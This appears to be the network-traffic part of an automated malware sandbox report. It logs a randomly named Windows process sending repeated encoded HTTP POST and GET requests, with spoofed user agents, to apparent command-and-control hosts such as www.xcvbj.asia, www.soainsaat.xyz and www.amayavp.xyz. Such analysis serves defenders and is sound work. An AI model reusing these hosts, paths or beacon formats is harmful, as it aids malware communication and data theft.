                                                        Data Raw: 6c 4a 6f 4c 6c 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 62 50 5a 6f 77 61 47 53 4a 53 36 70 59 4d 51 58 47 4c 57 59 46 58 69 6d 55 6d 52 4a 7a 69 58 4d 6d 58 46 6a 64 74
                                                        Data Ascii: lJoLl=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMbPZowaGSJS6pYMQXGLWYFXimUmRJziXMmXFjdt


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.549833149.88.81.190802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:34.193975925 CET1784OUTPOST /rq1s/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.xcvbj.asia
                                                        Origin: http://www.xcvbj.asia
                                                        Referer: http://www.xcvbj.asia/rq1s/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 32 69 32 45 38 50 6f 65 4a 4d 76 62 57 51 7a 33 4f 30 65 55 56 79 47 63 49 70 64 6c 78 34 59 56 49 53 4c 41 34 54 43 4d 6d 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 6f 42 38 75 2b 7a 4d 34 38 64 37 4e 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a 58 71 6c [TRUNCATED]
                                                        Data Ascii: lJoLl=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3quo2pW12i2E8PoeJMvbWQz3O0eUVyGcIpdlx4YVISLA4TCMmsyMZc4xoFheoicKIU/lPeCPvqskjFry9di9fXx1wStKBk/WBF4PaG7OwGut045oB8u+zM48d7N+Vv25Q7mX2XqnLTUQKFe8J9Nn8/Dfn+7C/4+jXqlFSMdCLIkw/STqEVxluvhR65C/53cFUngoj7pGH0C1M6Q9E/ohAmHdu52d2B+v91Lwiph01Xadcm+z3L85s+KS/O4S31AYBYd8RBlv6Y41AVIejm5Upcx476mFo1e1pcbv4eI8gA02+XazVEJGPDN2p3DFZ/5SdEEuCh9/forKqG3/02DVeIq8JKXc4dijcjZFBeYs1Ok65rtlUDtG/L1+SO2r96qdF+Je/bn1/E35tktNac1mk57wDnlGJSm1MNvqASHW/GVxsbkkVlSvosVs5EEJznUH9y+kPCD6bJNuqHnrSuOX75mGiLJQ7UCCsy+gLa6grL6DaFAFtnT3UNdBMo0hOOWOThvL/ianhooX//hTgp8Q+uOs8jORai/QDIUUwVJHyNBKelZRw04qnSt1mSA1SshEC2TcxWzAso5OxlTZeMi3Q625gsEhalXI5SSQN7FEyuKgRbs580HRHWxaxIYDPFBzwIWMrMRLOhpNTxc43fVPEeLtZ0e/4+tzQT/5tasAxLSxBl5GJ0Xq4YXjc1FKTaGxY60rj0dqiJyZDY63wO7vL1PJVbx2v9jVrCS6UDa+EXL2LLCk+j37QwqJwcIMmzBJmnTpZ8Qq3i6n+OILrz4NkUywn3peTEfGqCDfiaabr5KemWGGPAjd21vl/EGVRIZEdARaQ [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.549839149.88.81.190802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:36.845954895 CET490OUTGET /rq1s/?lJoLl=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFmKQ5u25OjPKezpJaRyWkNAYPVqp8tLi0/EjJnnGVWea/Pg==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.xcvbj.asia
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.54989885.159.66.93802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:05.130865097 CET756OUTPOST /rum2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.soainsaat.xyz
                                                        Origin: http://www.soainsaat.xyz
                                                        Referer: http://www.soainsaat.xyz/rum2/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 59 5a 52 48 31 33 54 56 70 72 62 32 41 53 55 37 38 47 57 71 41 7a 62 78 39 66 6e 76 75 70 44 73 6e 43 49 47 6e 45 3d
                                                        Data Ascii: lJoLl=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRoYZRH13TVprb2ASU78GWqAzbx9fnvupDsnCIGnE=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.54990685.159.66.93802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:07.834927082 CET776OUTPOST /rum2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.soainsaat.xyz
                                                        Origin: http://www.soainsaat.xyz
                                                        Referer: http://www.soainsaat.xyz/rum2/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 66 6a 68 75 58 51 2b 65 49 71 32 45 53 34 59 77 53 43 2b 58 76 72 2b 53 59 6a 71 52 5a 55 53 42 34 5a 4d 65 56 62
                                                        Data Ascii: lJoLl=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gfjhuXQ+eIq2ES4YwSC+Xvr+SYjqRZUSB4ZMeVb


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.54991185.159.66.93802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:10.491453886 CET1793OUTPOST /rum2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.soainsaat.xyz
                                                        Origin: http://www.soainsaat.xyz
                                                        Referer: http://www.soainsaat.xyz/rum2/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 61 36 70 69 42 50 6c 7a 5a 48 54 70 35 77 6e 35 6c 47 79 48 67 6d 2f 39 32 62 6c 2f 47 73 75 6f 44 4d 46 51 6d 45 64 65 71 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 65 43 67 47 4f 64 75 43 62 65 35 76 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d 6c 30 42 [TRUNCATED]
                                                        Data Ascii: lJoLl=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxa6piBPlzZHTp5wn5lGyHgm/92bl/GsuoDMFQmEdeqtPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMeCgGOduCbe5vRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpNkUMAvAC4sDacqlK+KkbbMG7ZD6qagLrZS72IP4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4kcJ4lftLvjWKVPIkgZ9G23eaSqTS2ZPAj7HiCKtSbiFjTW1Mf+kSRPe/CrPKESbfaxomr3JwN9ov/HZ9fLZpOz5Q68vgZFmXgVUXjEJYRvViFXqNADciIwy+z0ejAR+jSZ6rWn/9VBBglCyxLb9ISjFgBdbC+k5MHgYzIg/AkEMbCl2wlUIb3scYweQSS8fEWqkIW+9QGjgGtxos6ans615YqEiyiHdmVrMHbgZ+Ti2/26v+Y8qmRhkMcfTOICxtBLP5VmSkXFQgQAMXVP3NRcHDoXTIYz3+1fal038scyLh+27eW3eOiTAGeHg+2GnYUSeQv0WNazuwXjTaIVzMemM7Iv9rv0oybIzkh4txyQI3d/yi83YqzdHNEGJ/XNPpCmOMcDfmc0DB3T3Lx477tKjctLM9HxyU/iiNlATm2CsaC9QmRDWjc+1CR812dkVC4w1fxHydUwdUv8/tJ/w8UatHhoKBhji+r/RDAAwUZSiah59YFl0AnUqHD36IwlhAOdpX0j0NEJUOyJam [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.54991985.159.66.93802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:13.141850948 CET493OUTGET /rum2/?lJoLl=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB0ycck8sQYGv47r23Pk1HFbXKeUzp9pERW5uePswFB8aOdg==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.soainsaat.xyz
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:29:14.565514088 CET225INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.1
                                                        Date: Thu, 28 Nov 2024 08:29:14 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        X-Rate-Limit-Limit: 5s
                                                        X-Rate-Limit-Remaining: 19
                                                        X-Rate-Limit-Reset: 2024-11-28T08:29:19.3336265Z


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.549935185.27.134.144802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:20.355072021 CET750OUTPOST /d9ku/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.amayavp.xyz
                                                        Origin: http://www.amayavp.xyz
                                                        Referer: http://www.amayavp.xyz/d9ku/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 70 49 67 61 48 75 76 2f 71 30 30 7a 4a 58 2b 33 55 4a 61 4d 6d 51 50 57 6b 5a 2f 48 6f 6e 70 62 51 41 4d 4c 64 4d 3d
                                                        Data Ascii: lJoLl=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtpIgaHuv/q00zJX+3UJaMmQPWkZ/HonpbQAMLdM=
                                                        Nov 28, 2024 09:29:21.578273058 CET683INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:29:21 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Cache-Control: no-cache
                                                        Content-Encoding: br
                                                        Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d9 c1 0e 7a 9b 6b f6 ec 4f 90 7a 70 cc ad 11 48 97 04 a6 e9 f4 50 ab 11 c0 4f 2a da 33 4c 32 e5 16 b4 bf 80 a0 69 b1 1b 33 e5 9b b9 94 e5 04 23 67 11 58 80 53 4e 7e 7e d7 d6 0f 19 16 50 8a 58 07 1b 41 aa 8c 73 07 0e 4b da e2 28 47 e8 1f e2 be fb 9f 22 f1 e4 b6 01 3a c0 b5 62 e5 e7 37 b6 32 92 72 d7 68 5a d7 cf cf a5 50 f4 97 fe 9e fe c5 64 2e e5 f5 7c ae 76 97 3a 7c 25 98 c7 4e 42 88 bd e4 b5 6f d9 f7 6d af 7d 18 22 17 ca 20 ca 1b fb e9 bf 2f 21 87 15 84 28 bc 38 4a a0 41 10 e5 cb 2e 7b 43 42 ff eb ed 29 09 d0 7f 40 9f 67 99 56 c2 72 a1 a2 28 b6 a9 c8 4b 93 27 59 21 ac ce 04 d7 29 44 58 db bc 16 65 92 a6 26 76 ce 95 b9 49 84 48 4b c1 33 11 67 65 a6 53 e1 4b 3e 40 e6 31 cf bd 51 69 6e bd 17 85 2e ad 2e d3 58 29 6f 22 1f b9 3c 29 79 3e e2 da 4e cc b6 d1 13 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 11 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 91 f9 a1 6c [TRUNCATED]
                                                        Data Ascii: 1b9 t9p'yRUw9Q':,9q.zkOzpHPO*3L2i3#gXSN~~PXAsK(G":b72rhZPd.|v:|%NBom}" /!(8JA.{CB)@gVr(K'Y!)DXe&vIHK3geSK>@1Qin..X)o"<)y>NKXJ"we`plwW$s$*,djvj=Y1X .p-D)<fJZJoQZdV^!rP*g0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.549942185.27.134.144802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:23.120500088 CET770OUTPOST /d9ku/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.amayavp.xyz
                                                        Origin: http://www.amayavp.xyz
                                                        Referer: http://www.amayavp.xyz/d9ku/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 38 33 47 33 52 49 57 59 47 41 42 7a 51 38 56 4b 59 44 4f 6e 4d 7a 4e 33 75 63 48 71 44 61 4d 2b 63 33 79 6a 55 4c
                                                        Data Ascii: lJoLl=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfG83G3RIWYGABzQ8VKYDOnMzN3ucHqDaM+c3yjUL
                                                        Nov 28, 2024 09:29:24.271889925 CET683INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:29:24 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Cache-Control: no-cache
                                                        Content-Encoding: br
                                                        Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 d3 74 39 ad 1c b5 70 c1 12 27 79 52 f3 a9 bf 55 d1 77 ed c0 39 51 27 3a d5 c8 06 df 2c 39 71 c0 13 2e 8f ba d9 c1 0e 7a 9b 6b f6 ec 4f 90 7a 70 cc ad 11 48 97 04 a6 e9 f4 50 ab 11 c0 4f 2a da 33 4c 32 e5 16 b4 bf 80 a0 69 b1 1b 33 e5 9b b9 94 e5 04 23 67 11 58 80 53 4e 7e 7e d7 d6 0f 19 16 50 8a 58 07 1b 41 aa 8c 73 07 0e 4b da e2 28 47 e8 1f e2 be fb 9f 22 f1 e4 b6 01 3a c0 b5 62 e5 e7 37 b6 32 92 72 d7 68 5a d7 cf cf a5 50 f4 97 fe 9e fe c5 64 2e e5 f5 7c ae 76 97 3a 7c 25 98 c7 4e 42 88 bd e4 b5 6f d9 f7 6d af 7d 18 22 17 ca 20 ca 1b fb e9 bf 2f 21 87 15 84 28 bc 38 4a a0 41 10 e5 cb 2e 7b 43 42 ff eb ed 29 09 d0 7f 40 9f 67 99 56 c2 72 a1 a2 28 b6 a9 c8 4b 93 27 59 21 ac ce 04 d7 29 44 58 db bc 16 65 92 a6 26 76 ce 95 b9 49 84 48 4b c1 33 11 67 65 a6 53 e1 4b 3e 40 e6 31 cf bd 51 69 6e bd 17 85 2e ad 2e d3 58 29 6f 22 1f b9 3c 29 79 3e e2 da 4e cc b6 d1 13 c0 94 84 bf bf 4b b7 58 4a 18 22 0d 11 ec fc f5 fd 07 b5 ce cc 77 d3 65 60 70 8c 15 d6 08 85 b0 06 91 f9 a1 6c [TRUNCATED]
                                                        Data Ascii: 1b9 t9p'yRUw9Q':,9q.zkOzpHPO*3L2i3#gXSN~~PXAsK(G":b72rhZPd.|v:|%NBom}" /!(8JA.{CB)@gVr(K'Y!)DXe&vIHK3geSK>@1Qin..X)o"<)y>NKXJ"we`plwW$s$*,djvj=Y1X .p-D)<fJZJoQZdV^!rP*g0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.549948185.27.134.144802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:25.920838118 CET1787OUTPOST /d9ku/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.amayavp.xyz
                                                        Origin: http://www.amayavp.xyz
                                                        Referer: http://www.amayavp.xyz/d9ku/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
